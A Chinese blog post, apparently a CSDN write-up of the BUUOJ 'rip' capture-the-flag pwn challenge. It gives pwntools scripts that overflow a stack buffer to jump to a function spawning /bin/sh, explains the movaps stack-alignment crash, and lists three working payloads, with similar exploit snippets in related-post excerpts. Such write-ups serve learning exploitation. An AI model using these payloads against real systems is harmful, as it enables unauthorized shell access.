buuoj —— rip

最新推荐文章于 2023-05-25 23:35:57 发布
最新推荐文章于 2023-05-25 23:35:57 发布
阅读量582 收藏 1
点赞数
分类专栏: pwn/栈
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41027231/article/details/117327654
版权

常规思路

s溢出后将返回地址修改为fun函数地址,然而出错了

from pwn import *
# context(os="linux", arch="amd64", log_level="debug")

p = remote('node3.buuoj.cn',27714)
# p = process('./pwn1')
elf = ELF("./pwn1")
f_addr = elf.symbols["fun"]
payload = 'a'*23 + p64(f_addr)
p.sendline(payload)
p.interactive()
p.close()

在这里插入图片描述

原因

movaps指令是16字节对齐
【相关解释:
https://blog.csdn.net/happyblreay/article/details/104226884
http://blog.eonew.cn/archives/958#i-4】

测试 shell.c

// compiled: gcc -g -no-pie -Og shell.c -o shell
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main()
{
    system("/bin/sh");
    return 0;
}

程序编译之后能正常运行,但是我们要的是让程序不正常运行:
system函数调用了do_system,且do_system+1094处是movaps指令,因此在这里下断点,发现rsp+0x40是一个16字节对齐的地址为0x7fffffffdea0。
在这里插入图片描述
但如果将rsp+1
在这里插入图片描述
程序便出错了
在这里插入图片描述
而在本题中,用上面的脚本,执行到fun函数的call system指令时,栈(esp)并不是16字节对齐的,因此会报错。
在这里插入图片描述

成功方案

解决的核心思想是在call system语句时,esp是16字节对齐的。有以下三种解决办法。
1)payload = ‘a’*(0xF) + p64(f_addr)
这里虽然没有覆盖返回地址,而是继续返回调用main函数的__libc_start_main,该函数会执行call ebp,而此时ebp为leave时赋值的f_addr,且此时是栈对齐的。因此可以顺利执行fun函数。

2)payload = ‘a’*(0xF+0x8) + p64(f_addr + 1)
返回时跳过了fun函数的第一条指令push rbp,因此在call system指令时是栈对齐的。

3)retn = 0x401198
payload = ‘a’*23+p64(retn)+p64(0x401186)
返回时先执行了一句retn,栈弹出了8字节,从而使得call system指令时是栈对齐的。

参考链接

qq_41027231
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buu rip1
weixin_42238862的博客
10-02 1万+
文章目录前言一、看看程序有没有保护二、对程序源码进行分析1.判断溢出点2.手动测试溢出字符长度3.EXP总结 前言 本人刚刚入坑二进制不久,因为以前主玩渗透测试,所以喜欢学习理论的同时,做一些实战的题目,这不就在BUU上看到了一道pwn的入门题RIP1,但是这个题也让我知道二进制的门槛不是一般的高,第一次写文章,大佬勿喷! 一、看看程序有没有保护 常规操作,查看程序的位数以及各种保护机制!可以看到程序是linux下的程序为64位,并且没有开启任何保护 二、对程序源码进行分析 1.判断溢出点 把程序拖进
BUUCTF|rip
cm_zl
04-30 2125
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28808") payload = "A"*(0xf + 8) + p64(0x401198)+ p64(0x401186) io.sendline(payload) io.interactive()
2021-07-05-Buu刷题-pwn-rip--一些碰到的问题分析(做个题快做吐了,I’M so vegetable)
yundi的博客
07-06 1437
参考: https://www.cnblogs.com/yisicanmeng/articles/13906728.html https://www.cnblogs.com/vict0r/p/13773132.html https://blog.csdn.net/qq_41079177/article/details/99971701 https://blog.csdn.net/qq_53086690/article/details/116502865 出现的错误 1.直接复制脚本没改成node4.buuo
rip-buuoj
怪味巧克力的博客
07-15 1018
#前言 今天开始学pwn,以练促学,学以致用,加油加油 0x01 拿到文件,首先检查一下是多少位的,如图 可以看到是64位的文件 检查是否有保护,如图 看到没有任何保护 0x02 ida分析一下函数的逻辑 进入到反汇编如下,代码逻辑就是让我们输入,然后结束,我们主要看一下gets,因为gets有栈溢出漏洞 我们发现输入的地址空间大小为15,然后就执行函数返回地址,那么我们直接在15后将系统命令函数地址填入即可,或者直接写函数的名称,然后取函数地址也可以 0x03 exp from pwn impo
CTF buuoj pwn-----第2题:rip
bing_Max的博客
08-28 2603
CTF buuoj pwn-----第2题:rip 记录一下pwn的过程 同第1题一样,新手学习日记,流水线记录. 打开题目,连接靶机,下载文件’ript’ 1. 首先checkesc ,检测文件的保护机制. checksec在下载好pwntools后就有 参考链接: link. 参考链接: link. bing@bing-virtual-machine:~/pwn$ checksec test [*] '/home/bing/pwn/test' Arch: amd64-64-lit
BUU-rip
qq_45771413的博客
04-27 666
查看保护 IDA分析 看到gets函数,这里没有输入长度限制,输入的s为16位 接下来找有没有敏感权限: shift+f12 找到了 /bin/sh,打开发现其地址在401186 Tips:这里包含了system指令,若不包含还得找到system地址,payload(填充字符串+填充rbp地址+system地址+/bin/sh地址) 尝试写exp 运行后报错:Got EOF while reading in interactive from pwn import * p = remote('node3
BUUCTF刷题之路-rip1
qq_30528603的博客
05-25 1262
因为A存入内存是以ASCLL码形式存在 0x41就是A,我们填入的15个A已经在栈上了,而且返回地址就是401100,我们要做的就是覆盖这个返回地址,指向我们的后门函数fun,至此这题就完成了。让我们能得到一个shell.那我们就找一下这个fun函数的地址,因为题目没有开启PIE,所以程序每次加载的地址都是不变的。可以看到保护基本没开,是个很简单的栈溢出题目。左边这都是函数,带下划线的一般是系统提供的函数,我们分析前可以大致看看有哪些函数,都干了什么,对整体布局有个了解,我们一开始都回去分析main函数。
[BUUCTF]PWN2——rip
mcmuyanga的博客
08-23 1707
[BUUCTF]-rip 题目网址:https://buuoj.cn/challenges#rip 步骤: 例行检查附件,64位程序,没有开启任何保护 nc一下,看看输入点的提示字符串,让我们写入一个字符串,然后回显ok,bye 用对应位数的ida打开,shift+f12先来查看一下程序里有的字符串 这里可以看到有bin/sh还有system函数,对于这两个我们比较敏感,因为system(/bin/sh)这句代码能让我们直接获取shell 双击bin/sh跟进,然后安装ctrl+x查看一下哪里调用了这
Cisco Packet Tracer - 路由配置——RIP配置
07-06
在这个特定的“Cisco Packet Tracer - 路由配置——RIP配置”实验中,我们将探讨RIP(Routing Information Protocol,路由信息协议)的基础知识及其在Cisco设备上的配置方法。 RIP是一种距离矢量路由协议,主要用于...
CCNA 实验——RIP协议
05-09
RIP版本 默认 版本1:有类路由协议----发送更新时,不带掩码---广播更新 不支持可变长子网掩码,不支持不连续的网络 版本2:无类路由协议----发送更新时,带掩码---组播更新--224.0.0.9 支持不连续的网络,支持可...
周五计网小组实验12+张楷+19035331——RIP 路由协议基本配置1
08-08
实验环境说明:装有eNSP的PC图 1实验拓扑图 1实验拓扑实验拓扑:图 1实验拓扑图 1实验拓扑实验过程、步骤(可另附页、使用网络拓扑图等辅助说明)及结果:基
RIP——COMMAND
01-06
rip的命令,我总结的关于常见的rip的命令,很好用的亲。谢谢支持!谢谢!
RIP协议配置实验指导书
05-17
RIP协议,全称Routing Information Protocol,是一种内部网关协议(IGP),主要适用于小型或者结构简单的网络环境,如校园网或小型地区性网络。它采用距离矢量算法,通过UDP端口520来交换路由信息。RIP计算到达目的...
buuctf pwn rip 1,rop解法
amber_o0k的博客
11-07 1150
from pwn import * io = remote('node4.buuoj.cn', 27175) pop_rdi_ret=0x4011fb bin_sh=0x40201b syscall=0x401040 ret=0x401016 payload=b'a'*(0xf+8)+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(syscall) io.sendline(payload) io.interactive() 这个解法有点复杂了,强行构造了一波rop。.
buuctf rip 1,ret2text解法
amber_o0k的博客
08-06 1284
from pwn import * io = remote("node4.buuoj.cn",27708) payload = b'a'* 23 + p64(0x40118a) io.sendline(payload) io.interactive() 87和8a两个地址都能奏效,往上往下都不行。
BUUCTF (PWN) RIP详细分析
热门推荐
qy201706的博客
04-08 1万+
很简单的栈溢出,不过对于栈溢出具体过程不理解的会卡的很惨; 由于初学嘛,就看了网上的wp,好像都是之前版本的,现在用就不太对,可能我入坑BUUCTF比较晚,现在用的题都是运行在Ubuntu18上的,故需要考虑堆栈平衡~~
【Writeup】BUUCTF_Pwn_RIP覆盖一下
BAKUMANSEC - Just Do It
08-17 3852
0x01 解题思路 查看文件信息 ​ 没什么防护措施的ELF64文件。 拖入IDA x64,F5 ​ 显然可以通过栈溢出覆盖RIP。 发现命令执行函数 地址为0x401186 利用peda计算输入点距离RIP的偏移值 得出偏移量是23。 现在就可以写出覆盖RIP执行fun函数的EXP了。 0x02 EXP from pwn import * io=0 ...
记一道简单的RIP覆盖的pwn(远程的话因为ubuntu18缘故所以栈需要对齐)
doudoudedi
06-03 2620
记一道BUUCTF简单的RIP覆盖的pwn 这个题目就是单纯的RIP覆盖 直接打开64位IDA 直接就有shell可以直接利用 然后就是算偏移了 直接用gdb-peda的工具算出偏移为23 直接上exp: from pwn import * p=remote('buuoj.cn',6001) system=0x401186 payload='a'*23+p64(system) p.sendl...
南昌航空大学考研17个学院,59个专业课历年考试真题及答案汇总,备考资料题库笔记,专业课调剂信息查询.pdf
最新发布
07-15
南昌航空大学考研17个学院,59个专业课历年考试真题及答案汇总,备考资料题库笔记,专业课调剂信息查询.pdf

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值